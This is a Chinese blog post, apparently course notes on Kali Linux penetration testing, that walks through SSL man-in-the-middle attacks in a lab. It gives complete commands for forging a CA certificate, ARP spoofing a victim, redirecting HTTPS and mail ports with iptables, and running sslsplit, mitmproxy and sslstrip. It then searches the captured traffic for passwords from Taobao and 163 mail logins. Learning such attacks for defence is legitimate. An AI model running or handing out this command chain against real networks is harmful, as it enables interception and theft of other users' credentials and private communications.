Kali Linux渗透测试 104 SSL 中间人攻击

最新推荐文章于 2024-04-23 10:12:49 发布
最新推荐文章于 2024-04-23 10:12:49 发布
阅读量4.2k 收藏 20
点赞数
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/79706045
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. SSL 中间人攻击
2. sslsplit
3. Mitmproxy
4. sslstrip

1. SSL 中间人攻击

  1. 攻击者未与客户端和服务器通信链路中

    • ARP
    • DHCP
    • 修改网关
    • 修改 dns
    • 修改 hosts
    • ICMP、STP、OSPF

  2. 攻击过程

  3. 攻击的前提

    • 客户端已经信任伪造证书颁发机构
    • 攻击者控制了合法证书颁发机构
    • 客户端控制了合法证书颁发机构
    • 客户端程序禁止了显示证书错误告警信息
    • 攻击者已经控制了客户端,并强制其信任伪造证书

2. sslsplit

  1. 简介

    • 透明SSL中间人攻击工具
    • 对客户端伪装成服务器,对服务器伪装成普通客户端
    • 伪装服务器需要伪造证书,需要现在本地生成伪造证书
    • 支持 SSL 加密的 SMTP、POP3、FTP等通信中间人攻击

  2. 利用openssl 生成证书私钥

    root@kali:~# openssl genrsa -out ca.key 2048
    Generating RSA private key, 2048 bit long modulus
    ............................................+++
    ...+++
    e is 65537 (0x010001)

  3. 利用私钥签名生成证书

    root@kali:~# openssl req -new -x509 -days 1096 -key ca.key -out ca.crt
    You are about to be asked to enter information that will be incorporated
    into your certificate request.
    What you are about to enter is what is called a Distinguished Name or a DN.
    There are quite a few fields but you can leave some blank
    For some fields there will be a default value,
    If you enter '.', the field will be left blank.
    -----
    Country Name (2 letter code) [AU]:CN
    State or Province Name (full name) [Some-State]:jilin   
    Locality Name (eg, city) []:changchun
    Organization Name (eg, company) [Internet Widgits Pty Ltd]:alibaba
    Organizational Unit Name (eg, section) []:ali
    Common Name (e.g. server FQDN or YOUR name) []:alibaba
    Email Address []:123456@163.com

  4. 攻击者开启路由功能

    root@kali:~# vim /etc/sysctl.conf
    net.ipv4.ip_forward=1

  5. 配置 iptables 规则

    # 查看规则
root@kali:~# iptables -t nat -L -n

# 清空规则
root@kali:~# iptables -t nat -F

# 查看 80 和 443 端口是否有占用
root@kali:~# netstat -tulnp | grep 80
root@kali:~# netstat -tulnp | grep 443

# 编写规则
# PREROUTING:路由生效之前执行规则

# 发给 80 端口的流量转发给 8080
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

# 发给 443 端口的流量转发给 8443
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443

# MSA:邮件提交代理
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 

# SMTPS:简单邮件传输
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 

# IMAPS:接收邮件
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 

# POP3S:邮件传输
iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 

iptables -t nat -L -n

  6. 查看被攻击者的机器

    IPv4 地址 . . . . . . . . . . . . : 10.10.10.133
子网掩码  . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 10.10.10.2
DHCP 服务器 . . . . . . . . . . . : 10.10.10.254

  7. kali 实现 arp 欺骗

    # kali IP:10.10.10.131
# kali MAC:00:0c:29:89:71:eb 

# 向局域网广播,网关 10.10.10.2 的 MAC 地址为本机 的 MAC:0:c:29:89:71:eb
root@kali:~# arpspoof -i eth0 -t 10.10.10.133 -r 10.10.10.2

  8. 启动 sslsplit 进行攻击

    • 创建目录

      root@kali:~# mkdir -p /root/test/logdir/

    • 侦听 8080 和 8443

      sslsplit -D -l connect.log -j /root/test -S /root/test/logdir -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

  9. 被攻击者访问 https 网站

    https://www.taobao.com




  10. 攻击者查看捕获的内容


  11. 被攻击者访问 163 邮箱

    https://mail.163.com/


    root@kali:~/test/logdir# grep 456456 *


    root@kali:~/test/logdir# grep password *

  12. 为了避免证书报错,可以安装根证书

    将生成的 cs.crt 拷贝到 被攻击者机器上


  13. 在此访问淘宝

    不再提醒证书错误

3. Mitmproxy

  1. kali 实现 arp 欺骗

    # kali IP:10.10.10.131
# kali MAC:00:0c:29:89:71:eb 

# 向局域网广播,网关 10.10.10.2 的 MAC 地址为本机 的 MAC:0:c:29:89:71:eb
root@kali:~# arpspoof -i eth0 -t 10.10.10.133 -r 10.10.10.2

  2. 防火墙规则

    # Mitmproxy 只支持在 8080 侦听
iptables -t nat -F
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080

  3. mitmproxy 启动

    mitmproxy -T --host -w mitmproxy.log

  4. 被攻击者登录

    https://mail.163.com/

  5. 攻击者

    root@kali:~# ll mitmproxy.log 
-rw-r--r-- 1 root root 688868 3月  26 09:50 mitmproxy.log

4. sslstrip

  1. 简介

    • 与前两种工具不同,将客户端到中阿金人之间的流量变为明文
    • sslstrip -l 8080

  2. kali 实现 arp 欺骗

    # kali IP:10.10.10.131
# kali MAC:00:0c:29:89:71:eb 

# 向局域网广播,网关 10.10.10.2 的 MAC 地址为本机 的 MAC:0:c:29:89:71:eb
root@kali:~# arpspoof -i eth0 -t 10.10.10.133 -r 10.10.10.2

  3. 攻击者启动 sslstrip

    root@kali:~# sslstrip -l 8080
sslstrip 0.9 by Moxie Marlinspike running...

  4. 查看日志

    root@kali:~# cat sslstrip.log
网络安全打工人
关注
  • 0
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
最新kalisslsplit
vanony的博客
01-25 987
描述:   透明的SSL / TLS拦截。   SSLsplit是用于对SSL / TLS加密的网络连接进行中间人攻击的工具。 旨在用于网络取证,应用程序安全性分析和渗透测试。   SSLsplit旨在透明地终止使用网络地址转换引擎重定向到该连接的连接。 然后,SSLsplit终止SSL / TLS并启动到原始目标地址的新SSL / TLS连接,同时记录传输的所有数据。 除了基于NAT的操作外,SSLsplit还支持静态目标并将SNI指示的服务器名称用作上游目标.SSLsplit纯粹是透明代理,不能充当在浏
Kali Linux Web 渗透测试秘籍 第八章 中间人攻击
热门推荐
龙哥盟
10-12 4万+
第八章 中间人攻击 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介中间人(MITM)攻击是一种攻击类型,其中攻击者将它自己放到两方之间,通常是客户端和服务端通信线路的中间。这可以通过破坏原始频道之后拦截一方的消息并将它们转发(有时会有改变)给另一方来实现。让我们观察下面这个例子:Alice 连接到了 Web 服
Kali linux 学习笔记(五十八)Web渗透——SSLsslsplit、Mitmproxy、sslstrip) 2020.4.2
闵行小鱼塘
04-02 2482
本节学习SSL
kali中间人攻击----盗取账号和密码
最新发布
jennycisp的博客
04-23 888
声明: 本案例仅供个实验使用, 并不作任何违法违纪等不正当,请遵守约定。
android openssl漏洞,OpenSSL中间人安全限制绕过漏洞(CVE-2014-3511)
weixin_35747299的博客
05-31 432
发布日期:2014-08-06更新日期:2014-08-09受影响系统:OpenSSL Project OpenSSL < 1.0.1i描述:--------------------------------------------------------------------------------BUGTRAQ ID: 69079CVE(CAN) ID: CVE-2014-3511Op...
脆弱的SSL加密算法测试
Bul1et的博客
11-20 1796
  第一种方法  安装sslciphercheck sslciphercheck.exe -h ip地址或者域名 -p 443 执行结果中需要看下 SSLv2 那块,如果是白色的 Unsupported 就是不支持的意思,如果是红色的 supported 就是存在问题,最后一栏 TLS 下面显示 256bit supported 的而且是绿色的,表明是支持的强加密方式。 第二种方法...
Kali+mitmproxy 超级详细的ssl劫持和窥窃动妹子上网动态(劫包,返回想要的内容)
qq_40633669的博客
10-01 8671
这里提供每一步详细操作,由Hui3c编写 一、准备阶段 1. 查看Kali和win7的ip,确保在同一局域网ping通 windows 在命令提示符输入: C:\Users\233&amp;amp;amp;gt;ipconfig Kali在终端输入: root@hui:~# ifconfig 值得注意的是,我们需要记住这个网卡的号码! #kali ip 192.168.0.128 使用网卡0 #win7 ip...
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
Kali Linux渗透测试技术详解
02-19
介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限提升、密码攻击、无线网络攻击、...
基于Kali Linux渗透测试.pdf
09-06
基于Kali Linux渗透测试.pdf 本文档总结了基于Kali Linux渗透测试的知识点,涵盖了渗透测试的概念、方法、工具和过程等方面。 1. 渗透测试的概念 渗透测试是一种评估计算机网络系统安全的方法,通过模拟恶意...
KaliLinux渗透测试五步曲
03-23
TechTarget中国原创】KaliLinux的设计目的是渗透测试。不管渗透测试者的起点是白盒测试、黑盒测试,还是灰盒测试,在用Kali或其它工具进行渗透测试时,总要遵循一些步骤。  KaliLinux的设计目的是渗透测试。不管...
sslstrip:一种实现SSL剥离攻击的MITM工具
05-08
跳线 这是一种工具,可实现用Go编写的Moxie MarlinspikeSSL剥离攻击。 受启发。 要求 唯一的要求是Go。 没有其他依赖关系,只有该语言的标准库。 我们已经使用了1.9.2版的Go,但是它也可以与其他版本一起使用。 如果遇到问题,请打开问题。 正在安装 $ # clone the repo in your $GOPATH/src/sslstrip $ cd $GOPATH /src/sslstrip/cli $ go build main.go $ ./main -h Usage of ./main: -filename string the output log file or empty for stdout -log-response log responses -port int port to listen on (default 8000)
最新kalisslh
vanony的博客
01-24 988
描述:   协议多路分解器。   sslh接受指定端口上的连接,并根据对远程客户端发送的第一个数据包执行的测试进一步转发它们。   实现了针对HTTP,SSL,SSH,OpenVPN,tinc,XMPP的探针,并且可以识别可以使用正则表达式测试的任何其他协议。 一个典型的用例是允许在端口443上提供多种服务(例如,从公司防火墙内部连接到ssh,几乎永远不会阻塞端口443),同时仍在该端口上提供HTTPS。   因此,sslh充当协议多路分解器或配电盘。 它的名称来自其在同一端口上提供SSH和HTTPS的原始
最新kalissldump
vanony的博客
01-24 541
描述:   转储网络上的SSL流量。   ssldump是一个SSL / TLS网络协议分析器。 它标识所选网络接口上的TCP连接,并尝试将其解释为SSL / TLS通信。 当它识别SSL / TLS流量时,它将解码记录并以文本形式将其显示到stdout。 如果提供了适当的密钥资料,它将解密连接并显示应用程序数据流量。   ssldump已在FreeBSD,Linux,Solaris和HP / UX上进行了测试。 由于它基于PCAP,因此应该可以在大多数平台上使用。 但是,与tcpdump不同,ssldum
Kali linux 学习笔记(五十七)Web渗透——https攻防(opensslsslscan、sslyze) 2020.4.1
闵行小鱼塘
04-01 1585
学习https攻防
sslstrip+ettercap 对HTTPS/SSL进行攻击
agoago_2009的专栏
03-22 6602
一、安装ettercap 要安装ettercap,需要先安装: 1.libnet-1.1.2.1.tar.gz 2.libpcap-1.0.0.tar.gz 3.ettercap-NG-0.7.3.tar.gz 4.更新gtk2: yum install curl-devel gtk2-devel boost-devel (不然报错Package requirements (gtk+-2
kali攻防第5章 内网称霸之HTTPS账号密码获取
安全参透之旅
11-27 1万+
内网称霸之HTTPS账号密码获取   准备工具 1)KALI LINUX系统IP 10.10.10.131 2)WINDOWS 系统 IP 10.10.10.129 3)Arpspoof 嗅探工具 4)Sslstrip https的链接 5)ettercap抓包工具       步骤:   1、root@kali:~# arpspoof -i eth0 -t 10.10.
SSLstrip 中间人欺骗Https转Http获取密码
weixin_34347651的博客
05-24 353
***回顾SSLstrip + EtterCap 中间人***实现https转换成http 以获取帐号密码。Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获取数据。数据包转发 echo 1 > /pro/sys/net/ipv4/ip_forward然后开启Ettercap的iptables 功能把注析去掉来个arp欺骗不使用...
渗透过程中可能要用到的Kali工具小总结
weixin_50464560的博客
08-03 2598
渗透过程中可能要用到的Kali工具小总结 写在最前面 最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的 所以写一个渗透过程中可能用到的kali渗透工具的小小总结 写的不对 多多包涵 各位大佬轻喷 :D Kali用得好 牢饭准管饱 渗透不规范 亲人两行泪 先来了解一下Kali(From Wikipdeia) Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Of...
SSLstrip漏洞
07-27
SSLstrip漏洞是一种网络安全漏洞,它针对使用HTTPS加密协议的网站进行攻击。该漏洞使得攻击者能够在用户和网站之间进行中间人攻击,即劫持用户与网站之间的通信。 在正常的HTTPS通信中,客户端和服务器之间的通信是通过SSL/TLS加密的,确保数据的机密性和完整性。然而,当用户在浏览器中输入一个以HTTPS开头的网址时,浏览器会发送一个HTTPS请求到服务器,但攻击者可以通过一些手段将该请求转发到一个仅支持HTTP协议的恶意服务器。 攻击者的服务器会伪装成目标网站,并与用户进行通信。攻击者通过伪造证书、篡改页面内容等手段,让用户误以为自己正在与目标网站建立安全连接。攻击者可以窃取用户的敏感信息,如登录凭证、银行账号等。 为了防止SSLstrip漏洞的攻击,网站管理员和用户可以采取一些防御措施。网站管理员可以通过强制使用HTTPS连接、实施HSTS(HTTP Strict Transport Security)等措施来增强安全性。而用户则应该注意检查网址是否以https开头,避免点击不明链接,并尽量避免在公共网络上进行敏感操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值